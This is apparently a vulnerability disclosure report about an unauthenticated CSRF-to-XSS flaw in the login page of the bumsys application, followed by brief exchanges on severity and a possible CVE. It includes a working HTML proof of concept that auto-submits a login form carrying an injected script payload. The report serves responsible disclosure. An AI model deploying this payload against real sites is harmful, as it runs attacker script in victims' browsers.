Unauthenticated CSRF to XSS on login page in unilogies/bumsys
Reported on
Jan 27th 2023
Description
The user-email parameter is vulnerable to XSS on the login page. In this way it is possible to make execute Javascript code on an unauthenticated user.
To exploid the vulnerability, since the it is a POST request, it's necessary an HTML poc in order to trigger a CSRF on the login form which exploits the XSS
Proof of Concept
- insert in a empty HTML file this PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.bumsys.org/login/" method="POST">
<input type="hidden" name="user-email" value="">"><body onpageshow=alert(document.domain)>" />
<input type="hidden" name="user-password" value="12345678" />
<input type="hidden" name="keepAlive" value="on" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
- Now open the file just created in a browser when the user it's not authenticated. This is the result:
Impact
It is possible to execute malicious Javascript code on the victim session.
Thank you so much for reporting this issue. We will fix this in next release.
Thank you for the quick response. Is the report elegible for CVE once fixed?
@leorac, Is there any way to get the access of admin panel by using this issue?
Since this is unauthenticated, it's not possible to exfiltrate cookies in order to takeover other users session. That's why I've set as medium severity. Anyway it's possible to use this issue chained with other vulnerabilities and for tracking the user behaviour.
CVE assignment is up to the maintainer, please refrain from tagging admins for this request. Thanks!